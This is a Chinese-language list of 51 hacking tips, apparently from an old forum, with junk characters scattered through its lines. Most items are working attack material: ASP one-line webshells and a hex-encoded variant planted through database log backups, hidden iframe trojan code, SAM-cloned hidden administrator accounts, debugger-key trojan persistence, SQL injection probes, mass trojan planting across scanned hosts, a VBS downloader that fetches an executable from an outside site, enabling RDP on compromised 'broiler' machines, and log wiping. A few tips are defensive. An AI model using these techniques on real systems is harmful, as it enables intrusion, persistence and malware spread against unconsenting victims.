1、Xp系统修改权限防止病毒或木马等破坏系统,cmd下,
C. k0 O! [# Gcacls C:\windows\system32 /G hqw20:R# Q9 r: S& A. V4 f
思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入
0 R' m0 a$ j1 W6 p" |恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F* ]- F! ?8 V6 ~5 X R# w
6 `% [& [$ P' V5 L8 `2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。7 `2 u$ k5 |( A
& Q- O7 p/ C; n$ F' _5 b/ Z( j3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。
$ }: W/ P/ r5 w# g( b; O5 x. T7 m1 u; j
4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号
( ]+ l3 Q: O7 b/ E, y. T8 b" ~4 U' w1 ^ y% r$ O7 Y* L& S1 W: i( ?
5、利用INF文件来修改注册表
* \* i/ y8 r2 Y7 z( K& _4 Y[Version]
* d" H j8 g2 R( {5 t; ]& o8 RSignature="$CHICAGO$"* [ u' ^, q/ W* y8 T
[Defaultinstall]- v- L0 E# a( }$ F( j: @
addREG=Ating
4 D9 R3 n$ k4 e+ c/ e[Ating]+ W+ p6 v$ |& ?- O1 }" k, I
HKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1": \0 `; {! J k3 \4 |
以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:0 ]- c7 ~" i; M
rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径
, b. S7 K7 o8 q其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU! g3 ^- _! c* c" B# A5 N* p
HKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU
+ W* \/ [8 S$ ~; r' n# k6 b8 qHKEY_CURRENT_CONFIG 简写为 HKCC
) _* ?7 j f- F* t, r8 L0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值
) V, ?5 _9 I; w `% l% F0 i"1"这里代表是写入或删除注册表键值中的具体数据
8 _; o- z$ _) L& u6 L2 A
6 k6 _$ F7 X5 t0 T* Q6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,0 C! H; k$ p! W# G1 S
多了一步就是在防火墙里添加个端口,然后导出其键值
* y9 _' q. B/ m[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
4 w( K* y0 W( W& I) N6 s# i
; V8 g" r9 \* V* i n% N! K: |7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽
4 V, s8 U) B+ M/ V# I9 t在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。( C) ]( V! T" V; T
3 z: p5 a# A$ D3 F f- o
8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。
: E4 I1 u& q, R) E7 K T9 b
2 q; S: h* i. P5 v) s: r9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,% b9 g" O5 }4 }. I: @ L
可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。; F/ x+ e" q0 e }" i
' L# |" A1 Z5 D10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”1 `5 z# X& l& R, e
. U1 X$ w- r7 [1 _6 o11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,4 T* C$ J; a9 e* G) g K: Y2 K
用法:xsniff –pass –hide –log pass.txt3 j C& e0 i/ a3 r5 s# I8 e
# M3 ?6 q& d4 t/ Y( E1 }- c12、google搜索的艺术7 v$ h6 I: o& n
搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”7 @% c/ y8 @/ |" [, x5 L, I9 A
或“字符串的语法错误”可以找到很多sql注入漏洞。
g% D }9 J8 l) y# O2 s, |8 v G/ i# d' P3 p% g/ U
13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。" }% r1 D# N! T
2 C! V% e/ }9 e( h- W
14、cmd中输入 nc –vv –l –p 1987% t! Z7 y( Q$ Z4 t- r
做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃9 ?# Q' H* m m6 ?3 v: M3 p
' ]% a' J: _. ?# @( t15、制作T++木马,先写个ating.hta文件,内容为
4 D( [% V: r. o' |- R& ]3 {4 A<script language="VBScript">6 J: A' y$ @: Z4 L. d# k3 K( V
set wshshell=createobject ("wscript.shell" )
! ]5 Z- P3 H% U+ ?8 z* Qa=wshshell.run("你马的名称",1)
8 M- Q. }- }/ W$ }+ _" O- H- @window.close
+ J. U3 L$ P8 h3 P9 ^</script>
+ L& ^; T: w1 ]9 {2 q' g7 H" I! \再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。
- P V* l& T9 Q4 a0 y) C+ q
2 l, c J0 q& J6 t. `+ Q3 ]3 [16、搜索栏里输入8 H! z7 p% B1 O# P7 X
关键字%'and 1=1 and '%'='9 _% Q5 }3 Q5 K3 j/ ~
关键字%'and 1=2 and '%'='
0 L4 n* D# f. ?3 L8 b. Z比较不同处 可以作为注入的特征字符
& ?4 P0 U3 F; M: f
# K* g' L" M8 Y& G- y17、挂马代码<html>
' N1 ]: [, j1 G# Q1 W7 D; {<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>; K' v& M* X2 ]* F( D$ ~9 r
</html>
5 z7 X+ ^+ b/ V G& W$ c. }
x! B- I- D! v! \& A18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,$ K+ U) _: |* J5 ^/ {7 E/ B) ?
net localgroup administrators还是可以看出Guest是管理员来。; }# @# P4 H" O3 a
/ M! n1 R! U- Q+ `' u2 I( f7 I' V( }
19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等
: }; `! Q& z2 e8 _3 Z用法: 安装: instsrv.exe 服务名称 路径
' I2 n. j ]( E4 D3 k卸载: instsrv.exe 服务名称 REMOVE
% T+ q, ]6 D/ X+ i- v* Q5 z' Z# r" `3 n8 N- V) _
: y9 |! W/ V, S" B8 y21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉* R' b( I# x) v. Q
不能注入时要第一时间想到%5c暴库。1 U$ l) G/ k. m5 M2 ?
. Z+ ~6 J6 H/ K. I
22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~
" j1 B+ t+ f( Z% ?
& }* {+ W/ X/ a$ Q23、缺少xp_cmdshell时: e9 `* I! Q [( s: ^( e
尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll' X; `0 g8 z% H2 ]- t
假如恢复不成功,可以尝试直接加用户(针对开3389的)' [& G# n* T" H1 o+ u' `
declare @o int. L2 j5 R; G* B' @% q
exec sp_oacreate 'wscript.shell',@o out
# t( G! x, ]% J6 [exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员
/ {. ` V, X" a: }0 B! m8 |0 b7 i$ K% Z- {
24.批量种植木马.bat* @3 ~7 W9 h L6 f0 l
for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中# E% w' ~8 X8 q% U7 B
for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间
( m5 c* B- H% k5 a6 C1 M扫描地址.txt里每个主机名一行 用\\开头6 T& F2 t6 e- m6 N9 d ]' }
. H8 r5 x+ T: U! u25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。, p* Y2 q" y( a5 K
& C. ^* k2 I7 |
26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.1 r. ]2 C/ }7 G* I. Y3 M
将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.
) H3 D5 U5 d* G. ^5 { y+ a7 O6 k# r" [.cer 等后缀的文件夹下都可以运行任何后缀的asp木马- r( g7 w) y3 z" Y
/ ^' O1 I( T0 }# n27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP) N% g, t j# Y6 B& J/ x
然后用#clear logg和#clear line vty *删除日志) O$ U2 [5 P! H: y+ y s
1 `) |" y, w6 X ]4 q/ _) d" E
28、电脑坏了省去重新安装系统的方法
0 P9 e$ ]5 U, F! z纯dos下执行,
8 E( E- x9 a6 A* h6 Jxp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config
+ J; K4 ?: G/ e2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config
* x* ^% e1 K* q; u
, M; o; Z0 e- O7 L0 ]5 b29、解决TCP/IP筛选 在注册表里有三处,分别是:
, w* m& U6 l# f5 x, qHKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip" h+ ~% s: x: ` B0 p! }8 N# T7 Y
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
/ U- b) v) ^, @9 vHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
$ T% l3 t- O& N# x1 d* A- `0 x. b分别用3 o) I9 w+ S; f1 o O4 `; H9 m
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
: `& t: z! L3 C% g' cregedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
8 G3 |$ v1 P& u' ]- |$ k4 gregedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip/ E# H3 l5 m k/ c' d
命令来导出注册表项5 P( B7 e* S1 B4 g- J5 w
然后把三个文件里的EnableSecurityFilters"=dword:00000001,' A0 T: d9 M# ~2 P* Z4 p' ?6 ?4 |9 f' Z
改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用* w( Q% q- T1 R( J
regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。. W' B* @$ S1 A( }8 N
" D: o9 Q' Q4 i& x% Q) Y30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U
7 e1 w5 H- L% E3 h/ n. fSER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3
( C0 K6 D/ M; B( G5 |
- {1 r2 C7 g3 {- v0 n( T4 ]31、全手工打造开3389工具& m+ t* s2 o$ N5 a" ]
打开记事本,编辑内容如下:+ O5 d6 C) @% F! o6 Z: Z
echo [Components] > c:\sql6 D: Z3 K5 r7 ^9 D4 u3 d" b
echo TSEnable = on >> c:\sql7 F' b& Y5 S/ u. P# o" \4 M
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
7 d% }. D/ O/ j" G: Q5 z. [编辑好后存为BAT文件,上传至肉鸡,执行
! x9 u" U5 P$ C; p$ h9 G" S. }9 v5 R! m0 p# I$ r# u2 |
32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马# ?- q; a* w, m. I' W1 ^9 y' X7 f
8 k- x. P! ^) X- X% E) d, H
33、让服务器重启
( x0 ^! Q S: e写个bat死循环:* f( G, a6 Q3 c3 f* S2 m/ L
@echo off
" v8 P3 M0 Q, D9 ?:loop1
7 V+ @ M& A5 bcls
& P& ?" V- `. F; }, w# k/ u2 {start cmd.exe7 F3 x5 Q8 T; n- E2 h8 e1 A+ ]% ]
goto loop1
' R- W6 C2 B% N5 g6 _3 f( a保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启1 W' V' |& Q. @) O3 f
9 |9 x( m) j5 n2 T3 ?: O
34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,
# G; m9 ]: G" ?6 ?+ ]# B$ S@echo off
9 R/ j! k4 ^. a0 H4 c" xdate /t >c:/3389.txt. ?9 l( o8 E( F, l5 Q/ z" s3 W
time /t >>c:/3389.txt' d S2 Z! b5 {# r5 F- s- j
attrib +s +h c:/3389.bat5 k: z4 X8 o/ H. [4 \, r
attrib +s +h c:/3389.txt0 U; W% K( I9 E+ k
netstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt2 |+ y! V4 C5 x2 C; B; o
并保存为3389.bat6 q$ q( i6 P7 A: B# W% Q, Z
打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号
! h1 `5 w' v3 _9 G7 f- |" U* C: f3 F) }# O: Q$ R
35、有时候提不了权限的话,试试这个命令,在命令行里输入:
& z3 b5 F- v4 L/ d, I' kstart http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)5 C4 u7 g- g" j8 _3 I
输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。
7 C4 `; e7 B0 ^
8 \9 {1 S. ^: }/ q: f+ W36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件
4 S# E7 x7 _8 U ^2 T$ Iecho open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址6 u% U% g* N: _ U, ^/ U3 N
echo 你的FTP账号 >>c:\1.bat //输入账号
6 }, D" w" T. K* `9 B: ?* E$ Mecho 你的FTP密码 >>c:\1.bat //输入密码& @- I: P. A" o$ ]" J7 G+ {$ I
echo bin >>c:\1.bat //登入
5 F3 k! a, \7 E/ ?! F/ Becho get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么. ~ _1 O4 T& @, S2 p* S& m
echo bye >>c:\1.bat //退出2 u2 ?1 h; k% Q" F
然后执行ftp -s:c:\1.bat即可
: w6 x; d7 D7 Z) n( E Z. f9 w4 {
8 E7 h7 L6 I/ W# w" }+ p37、修改注册表开3389两法
/ L" N) I$ P {, O# r(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表0 G2 z; k, S( q0 @2 h0 x- B3 B4 H e
echo Windows Registry Editor Version 5.00 >>3389.reg
/ h. n; r8 J3 ] hecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
0 v$ F/ v2 l# U6 I, i+ Q4 y' |* @echo "Enabled"="0" >>3389.reg- D2 i, V; Q/ v" m2 ]9 E/ p
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
/ v) _8 E: p) t" j6 xNT\CurrentVersion\Winlogon] >>3389.reg
8 t) ?. e2 B6 Q3 a6 \2 `echo "ShutdownWithoutLogon"="0" >>3389.reg5 J6 B: L/ c; m9 a+ ]7 B
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
+ ?/ ~5 {" F( i0 q* R>>3389.reg1 [9 P! U, K4 O5 K
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg# {( n" I( G, U( o" ^5 _
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]. c. J1 X- p. g% q8 {8 M2 l
>>3389.reg
( Q# P, e) X+ C5 Eecho "TSEnabled"=dword:00000001 >>3389.reg
8 B% Q$ F7 f: O3 m% E* S Oecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg8 I7 ~. W1 O2 ?. u" \4 ]; Z0 P- f8 M2 ~
echo "Start"=dword:00000002 >>3389.reg9 |4 ^% S! I6 D# g' Q
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]$ H9 k9 \+ l: _% B# k
>>3389.reg, A& K- m5 { D& [8 ~9 B
echo "Start"=dword:00000002 >>3389.reg3 P. g9 j) @+ d3 J- c
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg; `3 `* x4 A/ V" X
echo "Hotkey"="1" >>3389.reg
; r0 a2 {9 @+ r, X7 _echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal6 ?' J8 z$ x2 R) v" J9 |' E9 V! i
Server\Wds\rdpwd\Tds\tcp] >>3389.reg
* p; A }7 v7 a1 v' F0 x! Mecho "PortNumber"=dword:00000D3D >>3389.reg, f- L1 i. H0 @1 w$ }
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
* T3 n, T& V' f' e! pServer\WinStations\RDP-Tcp] >>3389.reg
4 M g. c. c5 I! r6 S% \/ W; jecho "PortNumber"=dword:00000D3D >>3389.reg% T, R0 W: D, b1 \0 Y/ z ^. q$ F+ `
把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。
/ j' j6 f/ k* @8 C(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)
/ n4 m6 y" J) |$ ~5 d6 O2 |. j因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效
/ R+ r; l( G( e; I' h3 U8 a(2)winxp和win2003终端开启# B) C$ b0 s1 `
用以下ECHO代码写一个REG文件:
. c3 [; r2 A+ P: Z- jecho Windows Registry Editor Version 5.00>>3389.reg
' K0 X% m- @' xecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal m# K; C+ Z. F" t2 C3 D; o
Server]>>3389.reg# w. X5 y! }+ C( n. y* f, ?
echo "fDenyTSConnections"=dword:00000000>>3389.reg
- \; ^& i% O5 ^5 V4 i$ {echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal8 Z! U- j4 L1 v' W
Server\Wds\rdpwd\Tds\tcp]>>3389.reg% n5 Y: ?% n" P9 m8 J. q
echo "PortNumber"=dword:00000d3d>>3389.reg
- a& P" ^0 l, y4 v9 Q2 Necho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
# T) l* t, B9 I3 O0 WServer\WinStations\RDP-Tcp]>>3389.reg( f: |- e' k& w) a$ |
echo "PortNumber"=dword:00000d3d>>3389.reg
- X. V: ~: k% H: R8 \8 j. v4 {( n然后regedit /s 3389.reg del 3389.reg
. W- m* {/ u% I+ l3 CXP下不论开终端还是改终端端口都不需重启0 s! R/ y) i, N$ l
/ Q% V. O9 ]& ]38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃+ f' d( U9 w' ]3 u' s$ i9 L4 J
用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'" J3 {( d& e5 O
' U7 K) s; T) M' a E9 }( H
39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!
z3 A. C- e* v% ?(1)数据库文件名应复杂并要有特殊字符, O2 K. T" _1 X) q
(2)不要把数据库名称写在conn.asp里,要用ODBC数据源
: U" D* a! q1 }8 o7 X" ] f将conn.asp文档中的" O1 \" ]1 }2 m- N
DBPath = Server.MapPath("数据库.mdb")
. v- E5 Q4 W% @conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath" t Z8 ~. x6 H, [/ B4 \5 F
* n3 T- c7 Y( P h: _
修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置
8 j" B- p" f6 J6 N(3)不放在WEB目录里 d# k+ E: N. a1 I$ v4 d( Q$ O
3 X, f' L7 y5 v. ^, s7 [3 j8 u4 G
40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉' y. q3 ^+ L# q7 }9 ]' }$ r
可以写两个bat文件( Q% S, |$ @2 A2 l1 f* h1 k
@echo off2 P6 j2 n, ]3 v2 H: k
@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe
5 u' `7 q+ \6 e( }@del c:\winnt\system32\query.exe& V' A* z1 C {! F* H0 x
@del %SYSTEMROOT%\system32\dllcache\query.exe1 U: B. o4 A! t* k
@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的
& c* Z& v* m) P# r6 |6 Q' U9 n3 b
( [! Q% S0 Q9 X3 k% c% b1 V! S@echo off
$ t& i+ {1 W8 E% K" r. Y+ Z$ R@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe
2 ^2 e# x8 A M7 S@del c:\winnt\system32\tsadmin.exe
( r# t$ A7 k, j: U% s( a# g+ _@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex
& `( ?8 z" h% Y% u+ B" X
d, j. }6 {+ G5 [/ |. ?( ~41、映射对方盘符
. o5 I ] }$ F3 ~telnet到他的机器上,: w( P$ f2 L9 F5 e/ K
net share 查看有没有默认共享 如果没有,那么就接着运行
& ?; ] J5 G' B- Znet share c$=c:+ `7 I7 j, @- x9 k$ v q' ]2 A7 f0 P
net share现在有c$
+ O [2 z0 B0 V ~2 Q/ \在自己的机器上运行/ q4 ~" ~ {8 \1 z1 W4 D- s$ M
net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K) b9 r1 _" @/ |' T
# a* V* k0 h V% J/ Q* W/ S- E5 V
42、一些很有用的老知识
' a. ]/ |0 u: ?) C7 Z* x7 e' S) @type c:\boot.ini ( 查看系统版本 )
. ?2 V7 k8 M9 }( I0 bnet start (查看已经启动的服务)
+ Q* }3 K' H! q+ ?2 [/ K9 K, fquery user ( 查看当前终端连接 )7 h/ V" p" B/ z+ q- ]6 M% k
net user ( 查看当前用户 )" H% O; }$ D' d8 ^. Y4 V+ i
net user 用户 密码/add ( 建立账号 )4 G( Z4 x9 F4 e h/ L1 m Q
net localgroup administrators 用户 /add (提升某用户为管理员)
; e, C) j% o6 ?$ T1 Sipconfig -all ( 查看IP什么的 )
" E) [! `- \( |4 P: Qnetstat -an ( 查看当前网络状态 )
* D( U7 a! L2 b1 Q) V$ U/ Bfindpass 计算机名 管理员名 winlogon的pid (拿到管理员密码). W/ Q# m7 f4 l* n. [- n
克隆时Administrator对应1F45 ~0 Y; r. N d: t3 I
guest对应1F5
/ l- H9 T5 B$ L& G: v1 `9 Y. utsinternetuser对应3E8
; l0 ?" a* K! [3 J7 @
; G7 m9 {; ?1 v* \5 e. v43、如果对方没开3389,但是装了Remote Administrator Service \9 r# d; L# D6 L+ N0 U5 k6 P3 D2 B
用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接
$ G* E# c- b" R; D: D$ N: T5 q# ~解释:用serv-u漏洞导入自己配制好的radmin的注册表信息) a; b2 d0 d% E1 V( \, F+ f% W
先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"" e" s0 ]+ U" W2 X
+ K: m: A$ }# @4 L/ V- j6 `
44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)
+ g- I8 A, e1 p! I$ l) r/ H本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)/ E! e$ u( p9 U, d
& f6 L7 `; M! h4 Z3 R2 o3 N45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)5 |6 }( e: J* _! b
echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open0 E& `; Z. P" g, M: N
^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =3 x1 R/ F. w' n: \5 n7 |
CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =
- u3 c* O+ C$ N6 i7 E6 a& _2 Q1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs; H! z! ?! k$ b1 v
(这是完整的一句话,其中没有换行符)
$ z4 I# R" u; H" ^然后下载:
$ H8 Y k. q: `$ d% fcscript down.vbs http://www.hack520.org/hack.exe hack.exe j9 e" X4 F( g; i2 _$ j
% M0 v: \! D8 `, N+ F0 k1 |6 \* z( Y46、一句话木马成功依赖于两个条件:4 c( S2 T0 G: Z: {
1、服务端没有禁止adodb.Stream或FSO组件
! H- s x# j6 j/ \+ z- l. Q3 A2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。- k- M5 K, U2 p/ t& [6 v
W n! T% B. A$ ^; n47、利用DB_OWNER权限进行手工备份一句话木马的代码:
* s' t" d4 k, t- }( }. B, S;alter database utsz set RECOVERY FULL--
9 Y; `* l1 r# d- I7 `- U7 K$ l: b1 Z;create table cmd (a image)--: n+ U" S5 w- d
;backup log utsz to disk = 'D:\cmd' with init--( Q# _8 ~0 T- p6 u- ?
;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--
9 K5 Y: {2 G8 \;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--5 M$ V" u& N# U* ]( V0 P) @
注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。- E9 H j9 d0 @9 D
: J: q" P. @7 k48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:5 t+ t' ]% u# U
( _1 g$ O, {, i$ v; M用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options
4 k2 P ] Q# U* _1 j( G/ z所有会话用 'all'。
, G0 ~4 _$ r+ w* [# I& \1 m, g-s sessionid 列出会话的信息。
% f1 Y. J/ i$ _; H-k sessionid 终止会话。9 w4 p# E6 _: B1 W. ^5 A
-m sessionid 发送消息到会话。$ T8 K( X3 z! o! v& u
4 @ n' z2 g/ B1 B# F4 i, Rconfig 配置 telnet 服务器参数。
) |# [* N/ p) S4 ~6 |6 r- N, _+ E- L8 ? r
common_options 为:
) w8 u1 ?+ F* X- |-u user 指定要使用其凭据的用户
3 [7 | S) [4 A1 d( f+ ?-p password 用户密码
3 L3 i) P5 o' a* K* {- _, s
, B6 n: t) a' m: iconfig_options 为:
! I& D4 n2 E) g. i Vdom = domain 设定用户的默认域
5 w. T; R7 I# ?+ X+ zctrlakeymap = yes|no 设定 ALT 键的映射( P# ?# i: h3 Q) `8 X, k! ]6 ~
timeout = hh:mm:ss 设定空闲会话超时值! F e8 C/ r" Q1 _
timeoutactive = yes|no 启用空闲会话。; b9 p" r4 V( W6 p w8 `5 Z7 i$ V
maxfail = attempts 设定断开前失败的登录企图数。
8 F, ?7 V' P {, O2 x3 Hmaxconn = connections 设定最大连接数。' P6 y5 N- X, p4 e4 C6 X
port = number 设定 telnet 端口。 m2 M2 y# E4 r$ X. Q: I3 D
sec = [+/-]NTLM [+/-]passwd" s8 S( f: S9 ?0 r( U0 Z
设定身份验证机构, U" ^$ Z0 G2 L2 n" _. K" D
fname = file 指定审计文件名。
& x: c! }. ~) F3 Ufsize = size 指定审计文件的最大尺寸(MB)。3 p" R& g! L n
mode = console|stream 指定操作模式。8 f. w% l# E0 i# \% Q0 ?7 R6 q
auditlocation = eventlog|file|both2 Q$ P& a0 K t1 N' ?+ k$ u
指定记录地点
7 \7 t8 S4 V8 V/ ]: [9 k* ?+ maudit = [+/-]user [+/-]fail [+/-]admin+ Y* u: E/ B) D- N( E3 r; N
& N. W: H. |7 {0 f+ V4 A/ p) x5 H
49、例如:在IE上访问:
- d. ?: z: m9 F: j0 cwww.hack520.org/hack.txt就会跳转到http://www.hack520.org// I4 J' K8 G* ~
hack.txt里面的代码是:
+ w2 c8 E, X d$ F' [! @<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">& F' e& H# B! h* O3 M! N
把这个hack.txt发到你空间就可以了!
7 s0 e; s# J, F! s- h. t" O这个可以利用来做网马哦!
. B L& }* G/ H7 t( h
3 e8 J1 Q: s; c3 T50、autorun的病毒可以通过手动限制!
( w% C' v4 V% O K' D4 L' j1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!& m9 t% @$ Z6 s3 y4 P
2,打开盘符用右键打开!切忌双击盘符~
& O" F' P8 O4 c! S3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!( k9 B9 T" p7 ^9 V* Q/ p) x6 R `
( {9 {( N" g, o$ E) z$ y
51、log备份时的一句话木马:
0 H: R1 W/ X- T/ o T G/ _a).<%%25Execute(request("go"))%%25>
8 E, t7 x2 k* h; J( eb).<%Execute(request("go"))%>, a8 X9 J8 u" @1 z
c).%><%execute request("go")%><%
8 ~0 M6 V6 Y; F6 S5 j- ~! c, Dd).<script language=VBScript runat=server>execute request("sb")</Script>
4 I* f4 Q8 f/ a1 we).<%25Execute(request("l"))%25>4 |! y. D8 a$ [$ p# U, S! m
